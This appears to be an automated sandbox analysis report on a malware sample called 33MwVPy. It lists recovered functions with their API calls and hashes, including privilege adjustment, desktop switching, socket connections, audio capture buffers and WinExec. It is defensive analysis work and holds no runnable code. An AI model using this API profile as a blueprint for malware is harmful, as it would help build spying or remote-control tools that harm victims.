                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fe9f3cc1fea7d5ee8450eafc1c042c66722bbb9f0f52a4a2f863344ab84818e
                                • Instruction ID: b68aa329b36ba16f9528b4b9af46c4d5914aa62ca2a0186fe8d37714ff2860ce
                                • Opcode Fuzzy Hash: 2fe9f3cc1fea7d5ee8450eafc1c042c66722bbb9f0f52a4a2f863344ab84818e
                                • Instruction Fuzzy Hash: FE218171D01221ABDB21DB25CCC4A6B77DDAF12760F194950FD45FB291DAB4FC0185E0
                                Function 0330A224 Relevance: 6.1, APIs: 4, Instructions: 76windowstringCOMMON
                                Download Yara Rule
                                APIs
                                • IsWindowVisible.USER32(?), ref: 0330A244
                                • SendMessageW.USER32(?,0000000D,00000400,?), ref: 0330A277
                                • lstrlenW.KERNEL32(?), ref: 0330A284
                                • _wcsstr.LIBVCRUNTIME ref: 0330A2DE
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageSendVisibleWindow_wcsstrlstrlen
                                • String ID:
                                • API String ID: 2904981177-0
                                • Opcode ID: 2e12ec9dc514f3b09741754249677b3228e0e5d444971edd15d7632d7f56e119
                                • Instruction ID: 8766a698b3cecfba9073f70c21d9b4c505df66e87708821704d7f67b190a7bc6
                                • Opcode Fuzzy Hash: 2e12ec9dc514f3b09741754249677b3228e0e5d444971edd15d7632d7f56e119
                                • Instruction Fuzzy Hash: C4214775D4032CA6DB50EBA5DD85FDEB3ACAF09301F448096B704D7180DEB4A744CB94
                                Function 03340100 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,?,03330D62,?,?,?,?,03330E2D,?,?,10085840), ref: 03340105
                                • _free.LIBCMT ref: 03340162
                                • _free.LIBCMT ref: 03340198
                                • SetLastError.KERNEL32(00000000,100811E4,000000FF,?,03330E2D,?,?,10085840), ref: 033401A3
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_free
                                • String ID:
                                • API String ID: 2283115069-0
                                • Opcode ID: 03cc86f2fd8e960c195e2d773208e9cb1a03103ca8321f1bffce4cc580359c88
                                • Instruction ID: d1bb2d2d0e8b5ce6c3f0d059cb857fe42e894157844233b6c53fe34732cb36d3
                                • Opcode Fuzzy Hash: 03cc86f2fd8e960c195e2d773208e9cb1a03103ca8321f1bffce4cc580359c88
                                • Instruction Fuzzy Hash: A811C63EF003102BEA16E7F59CC8DAFA2DEEFC1671B290626F714EA5A0DE64A9004110
                                Function 03340257 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(00000008,?,?,0333B81A,03345C0B,?,0334FD41,?,?,?,?), ref: 0334025C
                                • _free.LIBCMT ref: 033402B9
                                • _free.LIBCMT ref: 033402EF
                                • SetLastError.KERNEL32(00000000,100811E4,000000FF,?,0333B81A,03345C0B,?,0334FD41,?,?,?,?), ref: 033402FA
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_free
                                • String ID:
                                • API String ID: 2283115069-0
                                • Opcode ID: 82c33be00a4b6c0ee501a6f6e4c5d1aeddf7e16f812ae8c19ae35d72468006ac
                                • Instruction ID: 5ce73498063bbe5f5723782f7fdfe0eedaf5674ac75b68836a2737d486adce90
                                • Opcode Fuzzy Hash: 82c33be00a4b6c0ee501a6f6e4c5d1aeddf7e16f812ae8c19ae35d72468006ac
                                • Instruction Fuzzy Hash: AA11083AF043106EEA16E7F98CC8DAFA1DEEFC16717290336F724EA5E0DE61A8004110
                                Function 03324294 Relevance: 6.1, APIs: 4, Instructions: 66synchronizationwindowCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?), ref: 033242D1
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 033242DC
                                • waveInAddBuffer.WINMM(?,?,00000020), ref: 033242F6
                                • DispatchMessageA.USER32(?), ref: 03324314
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: BufferDispatchEventMessageObjectSingleWaitwave
                                • String ID:
                                • API String ID: 204745351-0
                                • Opcode ID: 91c3ab766f53dfa8765724531b7ecddfc0a843ddaf9fbd75d6e3375ec496e0bd
                                • Instruction ID: 8c3d2ed35ce7962a9ef84722f83d1880ff49dade631a045ab0e91ea4ed22e5b7
                                • Opcode Fuzzy Hash: 91c3ab766f53dfa8765724531b7ecddfc0a843ddaf9fbd75d6e3375ec496e0bd
                                • Instruction Fuzzy Hash: E111B632A00318ABEB20DFA9DC85FAABBBDEB04720F450625F700D61D0DB71E5558B50
                                Function 0331922C Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(?,?), ref: 03319238
                                • EnumWindows.USER32(10027C20,?), ref: 033192E5
                                • LocalSize.KERNEL32(00000000), ref: 033192FF
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 0331930F
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$EnumFreeShowSizeWindowWindows
                                • String ID:
                                • API String ID: 2714159337-0
                                • Opcode ID: 8505f4f223a3e410378f2363e64f404afaa8e8562ed3af750e6042a69a0ecd47
                                • Instruction ID: b171b9bf3e8cc3f237b9ac4089224e8509cdfef8b5ea7991bc58729e4af8c44b
                                • Opcode Fuzzy Hash: 8505f4f223a3e410378f2363e64f404afaa8e8562ed3af750e6042a69a0ecd47
                                • Instruction Fuzzy Hash: 131106349083289FD769CF64DCD4B6AFBB9FB4A320F094816E84583690CB319452CBC2
                                Function 03325214 Relevance: 6.1, APIs: 4, Instructions: 55networkCOMMON
                                Download Yara Rule
                                APIs
                                • socket.WS2_32(00000002,00000001,00000000), ref: 0332522E
                                • htons.WS2_32(?), ref: 0332524D
                                • connect.WS2_32(00000000,?,00000010), ref: 0332525E
                                • closesocket.WS2_32(00000000), ref: 0332526E
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: closesocketconnecthtonssocket
                                • String ID:
                                • API String ID: 3817148366-0
                                • Opcode ID: b5c790aff7f59844bd167efd076bd3cbe13853ac220b29a4d6fbf574bd07cad8
                                • Instruction ID: 0d35c3f41c5c73eda33c3d7195614b36d901f681837ca5c5d8000adc67aa2a93
                                • Opcode Fuzzy Hash: b5c790aff7f59844bd167efd076bd3cbe13853ac220b29a4d6fbf574bd07cad8
                                • Instruction Fuzzy Hash: E3119E35A10628ABD710DFA88C85AAEFB75EF09720F41435AFC11AB281DBB05A508B90
                                Function 0332F03E Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0332F058
                                  • Part of subcall function 0332EFA5: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0332EFD4
                                  • Part of subcall function 0332EFA5: ___AdjustPointer.LIBCMT ref: 0332EFEF
                                • _UnwindNestedFrames.LIBCMT ref: 0332F06D
                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0332F07E
                                • CallCatchBlock.LIBVCRUNTIME ref: 0332F0A6
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                • String ID:
                                • API String ID: 737400349-0
                                • Opcode ID: 34d2527305fb361fe866b13f01d8eee121678cf240835e2e581a06a0c5e935de
                                • Instruction ID: a2a8cb3fb466b1ab58c26b57c81e72adfab318649d34a089b752409b41069081
                                • Opcode Fuzzy Hash: 34d2527305fb361fe866b13f01d8eee121678cf240835e2e581a06a0c5e935de
                                • Instruction Fuzzy Hash: 6B01E936500219BBDF12AE95CC81EEF7F79EF48794F058014FE086A120C736E861DBA0
                                Function 03319289 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageA.USER32(?,0000000C,00000000,?), ref: 033192B9
                                • EnumWindows.USER32(10027C20,?), ref: 033192E5
                                • LocalSize.KERNEL32(00000000), ref: 033192FF
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 0331930F
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$EnumFreeMessageSendSizeWindows
                                • String ID:
                                • API String ID: 2320866927-0
                                • Opcode ID: 0d83141b7bdb9f5f7491a9262f122cd7fb0a527e74cb6dfce13e9df2c54fd8da
                                • Instruction ID: 49a7eedca9870bbacc51d9ab18c24b2dfe6b0af8f981bb193a3fdd3f6f771f24
                                • Opcode Fuzzy Hash: 0d83141b7bdb9f5f7491a9262f122cd7fb0a527e74cb6dfce13e9df2c54fd8da
                                • Instruction Fuzzy Hash: 5311CE351083509FE314DF248884BAFFBAAFB85310F094919F98597291CB70A500CBA2
                                Function 03313097 Relevance: 6.0, APIs: 4, Instructions: 50synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001), ref: 033130BE
                                  • Part of subcall function 03322BF4: GetCurrentThreadId.KERNEL32 ref: 03322C0C
                                  • Part of subcall function 03322BF4: GetThreadDesktop.USER32(00000000), ref: 03322C13
                                  • Part of subcall function 03322BF4: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 03322C5E
                                  • Part of subcall function 03322BF4: lstrcmpiA.KERNEL32(?,?), ref: 03322CA2
                                  • Part of subcall function 03322BF4: SetThreadDesktop.USER32(00000000), ref: 03322CAD
                                  • Part of subcall function 03319554: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,?,?,00000124), ref: 033195D8
                                  • Part of subcall function 03319554: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00000124), ref: 033195DF
                                  • Part of subcall function 03319554: LookupPrivilegeValueA.ADVAPI32 ref: 0331960E
                                  • Part of subcall function 03319554: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,?,00000000,100787FC,?), ref: 03319628
                                  • Part of subcall function 03319554: GetLastError.KERNEL32(?,?,?,00000000,100787FC,?), ref: 0331962E
                                  • Part of subcall function 03319554: CloseHandle.KERNEL32(?,?,?,?,00000000,100787FC,?), ref: 03319638
                                  • Part of subcall function 03319554: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03319642
                                • LocalSize.KERNEL32(00000000), ref: 033130FA
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 0331310E
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03313119
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: DesktopThread$CreateCurrentLocalOpenProcessToken$AdjustCloseErrorEventFreeHandleInputLastLookupObjectPrivilegePrivilegesSingleSizeSnapshotToolhelp32ValueWaitlstrcmpi
                                • String ID:
                                • API String ID: 1649480584-0
                                • Opcode ID: 387fad0eee945e464ee7b6e67e00322d55f3219b51a25792a5d5f2852068785d
                                • Instruction ID: 8cd82c2f5745bfeab7ed6e6c112d55a70616837b667f341807dc7380196ac5b8
                                • Opcode Fuzzy Hash: 387fad0eee945e464ee7b6e67e00322d55f3219b51a25792a5d5f2852068785d
                                • Instruction Fuzzy Hash: CD116A75D442788AEB24EF64DC85BDDBB75EF41710F1001AAE50AAB291CFB50E84DF50
                                Function 033132EC Relevance: 6.0, APIs: 4, Instructions: 46synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001), ref: 03313313
                                  • Part of subcall function 0331C4F4: OpenSCManagerA.ADVAPI32(00000000,00000000), ref: 0331C53D
                                  • Part of subcall function 0331C4F4: OpenServiceA.ADVAPI32(?,?,000F01FF), ref: 0331C621
                                  • Part of subcall function 0331C4F4: QueryServiceConfig2A.ADVAPI32(00000000,00000001,?,?,?), ref: 0331C64C
                                • LocalSize.KERNEL32(00000000), ref: 0331333D
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 03313351
                                • WaitForSingleObject.KERNEL32(?,000000FF,00000030), ref: 0331335C
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalOpenService$Config2CreateEventFreeManagerObjectQuerySingleSizeWait
                                • String ID:
                                • API String ID: 2777808081-0
                                • Opcode ID: cf991e039b4b1dec669e50928612f8d8b3542e362af350327ff6a5f1aeb68dcc
                                • Instruction ID: 3947ded71bd9fcb2eba79af2b8ee62f730e90bb562f304b4155a4bec4e25c67e
                                • Opcode Fuzzy Hash: cf991e039b4b1dec669e50928612f8d8b3542e362af350327ff6a5f1aeb68dcc
                                • Instruction Fuzzy Hash: 09113936D452789BEB25EB54DC91BEDB775EF04710F01029AE50AAA2A1DFB14E81CF40
                                Function 033191F8 Relevance: 6.0, APIs: 4, Instructions: 42windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 03319201
                                • EnumWindows.USER32(10027C20,?), ref: 033192E5
                                • LocalSize.KERNEL32(00000000), ref: 033192FF
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 0331930F
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$EnumFreeMessagePostSizeWindows
                                • String ID:
                                • API String ID: 3056338389-0
                                • Opcode ID: 7218879d7b22dc29a5ea66822400e57c1ffaec3016dde0ba239aafd8abc2488d
                                • Instruction ID: 8945b26b33847a76cf8242f3bd3b9b1c6db94286e5d61558d5897bd52b0e9002
                                • Opcode Fuzzy Hash: 7218879d7b22dc29a5ea66822400e57c1ffaec3016dde0ba239aafd8abc2488d
                                • Instruction Fuzzy Hash: 4301F931604310AFE318DB648C94BAEF796EF45721F098919F9459B2D0CFB0A4518B92
                                Function 03319012 Relevance: 6.0, APIs: 4, Instructions: 42processCOMMON
                                Download Yara Rule
                                APIs
                                • WinExec.KERNEL32(10078810,00000000), ref: 03319019
                                  • Part of subcall function 03319384: LocalSize.KERNEL32(00000000), ref: 03319395
                                  • Part of subcall function 03319384: LocalFree.KERNEL32(00000000,00000000,00000000,?,?,?,033191BA), ref: 033193A5
                                • EnumWindows.USER32(10027C20,?), ref: 033192E5
                                • LocalSize.KERNEL32(00000000), ref: 033192FF
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 0331930F
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$FreeSize$EnumExecWindows
                                • String ID:
                                • API String ID: 2777794834-0
                                • Opcode ID: d6362d383b7b99c3b6410264b419bb6b5519de37d071b45d94187f584c31750d
                                • Instruction ID: 7a4b4a25c8c62c6972237e43cf4bbd8243eb44ccbc2db34bf73db7219881fabb
                                • Opcode Fuzzy Hash: d6362d383b7b99c3b6410264b419bb6b5519de37d071b45d94187f584c31750d
                                • Instruction Fuzzy Hash: CB012D356043105FD318DB648CD4BAEB796EF85711F098819F845873D0CF7094118B93
                                Function 0331921C Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                • EnableWindow.USER32(?,00000001), ref: 03319221
                                • EnumWindows.USER32(10027C20,?), ref: 033192E5
                                • LocalSize.KERNEL32(00000000), ref: 033192FF
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 0331930F
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$EnableEnumFreeSizeWindowWindows
                                • String ID:
                                • API String ID: 1699253361-0
                                • Opcode ID: 3b358672763012f957d0365505713e193c75d57b966184c72a10aeeb3238a34e
                                • Instruction ID: 8e28348a40c09cf1cb7fdf2d3b799a2c59e5a70705a3f53579b841876a97133f
                                • Opcode Fuzzy Hash: 3b358672763012f957d0365505713e193c75d57b966184c72a10aeeb3238a34e
                                • Instruction Fuzzy Hash: A9F02831608220AFE318DF64CCD4BAEFBA6EF45321F098819F84587290CF70D8518B92
                                Function 0331920C Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                • EnableWindow.USER32(?,00000000), ref: 03319211
                                • EnumWindows.USER32(10027C20,?), ref: 033192E5
                                • LocalSize.KERNEL32(00000000), ref: 033192FF
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 0331930F
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$EnableEnumFreeSizeWindowWindows
                                • String ID:
                                • API String ID: 1699253361-0
                                • Opcode ID: a087b2dd20fa5c39ec792ef82cec641fcdad769194b80b12d621af6c502eb287
                                • Instruction ID: 1a686d4c2654fe52ebbeab0f1932c94c63ee6749c50fe813def82b0c1d135e4b
                                • Opcode Fuzzy Hash: a087b2dd20fa5c39ec792ef82cec641fcdad769194b80b12d621af6c502eb287
                                • Instruction Fuzzy Hash: 8AF0C831608220AFE319DF64CCD4BAEFBA6EF45721F098959F84597290CF70E8518B92
                                Function 033123E4 Relevance: 6.0, APIs: 4, Instructions: 35synchronizationthreadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 03312405
                                • CreateThread.KERNEL32(00000000,00000000,10020310,?,00000000,00000000), ref: 0331241F
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0331242C
                                • CloseHandle.KERNEL32(?), ref: 03312435
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                • String ID:
                                • API String ID: 3360349984-0
                                • Opcode ID: 4a9e6af0ab6b8cbca915cad7cca1c213d56958b0c389dc99dd025bdf113dac05
                                • Instruction ID: f54606e51e1a0b4728f0c2717eb72f4fe9e4390f74c29335ff2ac4329cce8945
                                • Opcode Fuzzy Hash: 4a9e6af0ab6b8cbca915cad7cca1c213d56958b0c389dc99dd025bdf113dac05
                                • Instruction Fuzzy Hash: C3F03631A44228BBEB10DFE48C46FDE7FB5EB09711F114155FB24AB2D1D6B15A548BC0
                                Function 03314064 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 03314088
                                • CancelIo.KERNEL32(?,?,03313A03,?,00000000,033136D8,?,?,10081068,?,?,?,00000000,10062583,000000FF), ref: 03314094
                                • closesocket.WS2_32(?), ref: 033140AA
                                • SetEvent.KERNEL32(?,?,03313A03,?,00000000,033136D8,?,?,10081068,?,?,?,00000000,10062583,000000FF), ref: 033140B6
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: CancelEventclosesocketsetsockopt
                                • String ID:
                                • API String ID: 852421847-0
                                • Opcode ID: 18a416a65e308fca91516f1ab9571e52320d33af3778e9c1de1ab6d92bd37963
                                • Instruction ID: df6f8a5613b988293f7468834407b88d54820ddb872680da4a738be61adc74fd
                                • Opcode Fuzzy Hash: 18a416a65e308fca91516f1ab9571e52320d33af3778e9c1de1ab6d92bd37963
                                • Instruction Fuzzy Hash: C5F05E31000715EFEB619B60CC49B967BABEF05310F514269F56A861B0DFB12848DB81
                                Function 033387D4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 275COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-
                                • API String ID: 1302938615-2137968064
                                • Opcode ID: b48ee1d6b18f88f0411523d0322e26c1ef7b4b971c9e85ef0cb98560f242df0d
                                • Instruction ID: 674f3269cac926e6f609364c5dd87fee101b2478431b39975a533ae5ddb6e2ed
                                • Opcode Fuzzy Hash: b48ee1d6b18f88f0411523d0322e26c1ef7b4b971c9e85ef0cb98560f242df0d
                                • Instruction Fuzzy Hash: DE91C131D00258AECF20DEA8CCD06FDBBB5EF87221F18C259F465AF290D7345A4A8B51
                                Function 03350576 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: __dosmaperr_free
                                • String ID: SystemRoot
                                • API String ID: 3116789124-2034820756
                                • Opcode ID: ff318445c9a86364be5baeb4fc702bfe9013f1793fb2e3f43f3e5ada66c52030
                                • Instruction ID: 162c6bad0dba2c8af057af9b45966fe8e07de24007015d7ac520ab2f1e1dfe3d
                                • Opcode Fuzzy Hash: ff318445c9a86364be5baeb4fc702bfe9013f1793fb2e3f43f3e5ada66c52030
                                • Instruction Fuzzy Hash: F321F675A05305AFEB18DE68CCD0BAAB7A8EF46764F2880A9FC45DB341D672DD01C750
                                Function 033111D4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100librarystringCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNEL32(100782C8,10081068), ref: 03311218
                                • lstrlenW.KERNEL32(?), ref: 033112A3
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadlstrlen
                                • String ID: Time
                                • API String ID: 2903552948-3483776891
                                • Opcode ID: 66dc3ac0a5c7e6bf8b4a1d02e65aac9550fe6383deacdd14883f52ca131d7556
                                • Instruction ID: a18e86a4a0a790d7f547d68cd3a48b096bd3149623f7961333aacf6ca456eb97
                                • Opcode Fuzzy Hash: 66dc3ac0a5c7e6bf8b4a1d02e65aac9550fe6383deacdd14883f52ca131d7556
                                • Instruction Fuzzy Hash: F6310971D0022DBFEB11DFA9CC84EEEBBBDEB49654F10412AFA05E2250DB7559018B64
                                Function 03323664 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(10079594,10081068,?,Enable,?,?,?,?,?,00000000,1003AC40,1007CC88,000000FE,?,03324F35,10078A50), ref: 033236A6
                                • FreeLibrary.KERNEL32(1007CC88,?,?,?,?,?,00000000,1003AC40,1007CC88,000000FE,?,03324F35,10078A50,00000001,Enable), ref: 03323806
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$FreeLoad
                                • String ID: Enable
                                • API String ID: 534179979-4094479620
                                • Opcode ID: c1c41c57d4fc032f5e320ea4ce6acce0b14ebedf8d2bbd3b5f09ef1b2b81843d
                                • Instruction ID: f66d03dbb3eb21d7b6911ec87b054981832ac58bfe8c4e9a2a5025f058f44e45
                                • Opcode Fuzzy Hash: c1c41c57d4fc032f5e320ea4ce6acce0b14ebedf8d2bbd3b5f09ef1b2b81843d
                                • Instruction Fuzzy Hash: 5921E6B5D14228AFDB01DFA9DC80ADDFFB9FB58210F10412AE914F2260DB7958408F68
                                Function 03313462 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001), ref: 03313489
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001), ref: 033134BF
                                  • Part of subcall function 033139E4: WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,033136D8,?,?,10081068,?,?,?,00000000,10062583,000000FF,?,0330AB8F), ref: 03313A16
                                  • Part of subcall function 033139E4: RtlDeleteCriticalSection.NTDLL(?), ref: 03313A33
                                  • Part of subcall function 033139E4: WSACleanup.WS2_32 ref: 03313A39
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: ObjectSingleWait$CleanupCreateCriticalDeleteEventSection
                                • String ID: p
                                • API String ID: 1919503478-2181537457
                                • Opcode ID: a6ac1f37238eb3af88b1c218b626aaf9c0859b6f5c2dbe43e29363a588e6acdd
                                • Instruction ID: a2e48620381095e14bbc0c720822f9b3164fb03502e42f22a83bd9afdf6b2cdc
                                • Opcode Fuzzy Hash: a6ac1f37238eb3af88b1c218b626aaf9c0859b6f5c2dbe43e29363a588e6acdd
                                • Instruction Fuzzy Hash: 1B015A35D882688ADB24DF50DC81BDDBB75FB44710F0002EBE55AA7282DFB51A94CF40